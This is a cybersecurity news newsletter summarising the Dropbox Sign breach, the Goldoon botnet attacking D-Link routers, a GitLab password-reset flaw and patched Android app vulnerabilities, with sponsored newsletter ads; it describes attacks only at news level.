May 03 2024
Welcome to Gone Phishing, your daily cybersecurity newsletter that wishes there wasnโt plenty more phish in the cyber-sea ๐ ๐๐ฉ
Itโs Friday, folks, which can only mean one thingโฆ Itโs time for our weekly segment!
It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโs it.
Congrats, the cybercriminals are no matchโฆ for your patch! ๐ฉน๐ฉน๐ฉน
๐จ Patch Now Available for Vulnerable Android Apps, incl. Xiaomi, WPS Office! ๐ฑ
Attention Android users! Act swiftly to safeguard your devices! ๐ Popular apps like Xiaomi File Manager and WPS Office were recently found vulnerable to a serious path traversal-related flaw, putting over 1 billion and 500 million instals at risk, respectively.
Exploitation of this flaw could grant attackers full control over affected apps, leading to potential token theft and unauthorised access to your sensitive data.
But fret not! Both Xiaomi and WPS Office have released patches as of February 2024. It's crucial to update your apps immediately to mitigate the risk. Remember, your security matters! ๐ก๏ธ
Now, on to todayโs hottest cybersecurity news stories:
โ ๏ธ Dropbox users beware! Digital signature breach affects all users ๐ฆ
๐ค Enter Goldoon botnet, targeting D-link routers w/ decade-old flaw ๐
๐งช GitLab password reset vulnerability is being exploited, warns CISA ๐ก๏ธ
Cloud storage giant Dropbox revealed on Wednesday that its digital signature product, Dropbox Sign (formerly HelloSign), fell victim to a breach orchestrated by unidentified threat actors. The security incident compromised emails, usernames, and account settings associated with all users of the service, as disclosed in a filing with the U.S. Securities and Exchange Commission (SEC). The breach, which occurred on April 24, 2024, marks the second such incident to hit Dropbox within two years. ๐๐
Scope of the Breach ๐ญ
According to Dropbox, the attackers accessed a wealth of user data, including emails, usernames, phone numbers, hashed passwords, and certain authentication information such as API keys and OAuth tokens. Furthermore, the breach extended to third parties who interacted with Dropbox Sign, exposing their names and email addresses. While investigations found no evidence of access to users' account contents or payment information, the incident raises concerns about the security of personal data. ๐ง๐
Modus Operandi ๐ ๏ธ
The attackers exploited a service account within Dropbox Sign's backend, leveraging its elevated privileges to access the customer database. The breach is believed to have stemmed from the compromise of a Dropbox Sign automated system configuration tool. While the company did not disclose the exact number of affected customers, it assured users of proactive measures, including password resets, logouts from connected devices, and rotation of API keys and OAuth tokens, to mitigate risks. ๐๐ก๏ธ
Response and Ongoing Investigation ๐ต๏ธ
Dropbox affirmed its cooperation with law enforcement and regulatory authorities and committed to providing affected users with comprehensive support and guidance. Meanwhile, investigations into the breach continue to uncover the full extent of the incident and bolster defences against future threats. ๐ผ๐
Strengthening Security Measures ๐ช
As breaches become increasingly prevalent, organisations must prioritise robust security measures and proactive risk management strategies to safeguard user data and maintain trust. Dropbox's commitment to transparency and swift action underscores the importance of swift response and collaboration in the face of evolving cyber threats. ๐จ๐ค
While the fallout from the breach remains a concern, Dropbox's efforts to contain the incident and support affected users serve as a reminder of the ongoing battle to protect sensitive information in an ever-changing threat landscape. ๐ก๏ธ๐ป
Security researchers have uncovered a new botnet dubbed Goldoon, which exploits a critical security flaw dating back almost a decade in D-Link routers. The vulnerability, CVE-2015-2051, affects D-Link DIR-645 routers, granting remote attackers the ability to execute arbitrary commands via specially crafted HTTP requests. Once compromised, these devices become conduits for further attacks, including distributed denial-of-service (DDoS) assaults. ๐ก๏ธ๐
Modus Operandi ๐ ๏ธ
The Goldoon botnet leverages CVE-2015-2051 to execute a dropper script from a remote server, which, in turn, downloads the next-stage payload for various Linux system architectures. This payload acts as a downloader for the Goldoon malware, which is retrieved from a remote endpoint. To cover its tracks, the dropper removes the executed file and deletes itself. Goldoon establishes persistence on the host and connects to a command-and-control (C2) server to await further instructions. The malware boasts an array of 27 DDoS flood attack methods, spanning multiple protocols. ๐๐ฅ
Evolving Threat Landscape ๐
While the vulnerability is not new, its exploitation underscores the evolving tactics of cybercriminals and advanced persistent threat (APT) actors. Compromised routers serve as anonymization layers and are rented out for various illicit activities, from proxy services to conducting cyberattacks. Recent incidents, including the dismantling of the MooBot botnet by the U.S. government, highlight the pervasive threat posed by compromised routers. Trend Micro's observations further emphasise the versatility of these compromised devices, which can be repurposed for a range of malicious activities. โ ๏ธ
Securing the Infrastructure ๐
The emergence of Goldoon reinforces the importance of robust cybersecurity measures and timely patching of known vulnerabilities. Organisations and individuals alike must prioritise the security of their network infrastructure to mitigate the risk of exploitation by threat actors. As the threat landscape evolves, proactive defence measures and collaboration between security professionals remain essential in safeguarding against emerging threats. ๐ก๏ธ๐
In the face of escalating cyber threats, vigilance and proactive security practices are paramount to thwarting malicious actors and preserving the integrity of digital ecosystems. The discovery of Goldoon serves as a stark reminder of the ever-present need for heightened cybersecurity vigilance in an increasingly connected world. ๐ป๐จ
Stay ahead of the curve with Presspool.ai! ๐ Subscribe to their newsletter for the latest buzz in the information technology space, with a special focus on AI. Their slogan says it all: "Actionable marketing insights for the visionary AI executive." ๐ค๐ก Thatโs us, alright! ๐คต How about you? Visionary AI executive, much? ๐
And if the newsletter gets your motor running then you can take a butchers at their cool AI marketing product too which is sure to help you make the most of our new artificial overlords and put them to work for your business ๐ค๐ฉโ๐ป๐
Rest assured, the process is very straightforward.
You simply:
๐ Sign Up & Create Campaign
๐ Define your audience, budget, and message to captivate your audience.
๐ Launch your campaign, as Presspoolโs AI matches it with ideal newsletter audiences for optimal reach and conversions. ๐ฏ
๐ต๏ธ Finally, you leverage real-time analytics to track performance and refine future strategies. ๐ Elevate your marketing game and stay informed with Presspool.ai! ๐ Simples! ๐ฆฆ
Presspool.aiย ๐ฐ๐๐ค may just have what you need to succeed. And if the product isnโt for you, the newsletter alone is a gamechanger. And we know newsletters ๐
CISA has flagged a critical vulnerability in GitLab, tracked as CVE-2023-7028, due to ongoing exploitation. The flaw, with a severity score of 10.0, allows attackers to execute account takeover by sending password reset emails to unverified addresses. ๐ฑ๐
The Risk โ ๏ธ
The vulnerability, affecting GitLab versions 16.1.0 onwards, impacts all authentication mechanisms. Successful exploitation grants attackers control over user accounts, potentially leading to data theft, source code manipulation, and supply chain attacks. The consequences could be severe, compromising system integrity and enabling unauthorised access. ๐ป๐ก๏ธ
Mitigations ๐
GitLab has released patches in versions 16.5.6, 16.6.4, and 16.7.2, with backported fixes available for earlier versions. Federal agencies are urged to apply these updates by May 22, 2024, to safeguard their networks against exploitation. Vigilance and prompt action are essential to mitigate the risk posed by this critical vulnerability. โ ๏ธ๐
As organisations race to bolster their cybersecurity defences, addressing known vulnerabilities promptly is crucial to mitigating potential threats and safeguarding against malicious actors. Stay informed and proactive to protect your digital assets and ensure a resilient security posture. ๐๐ก๏ธ
๐๏ธ Extra, Extra! Read all about it! ๐๏ธ
Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!
๐ก๏ธ Tl;dr sec: Join 30,000+ security professionals getting the best tools, blog posts, talks, and resources right in their inbox for free every Thursday ๐
๐ตย Crypto Pragmatist: Crypto made simple. Actionable alpha in 5 minutes, 3x a week. Join 47,000+ investors and insiders, for ๐
๐ย Bitcoin Breakdown: The best in Bitcoin, carefully curated by an alien from the future ๐พ
Let us know what you think.
So long and thanks for reading all the phish!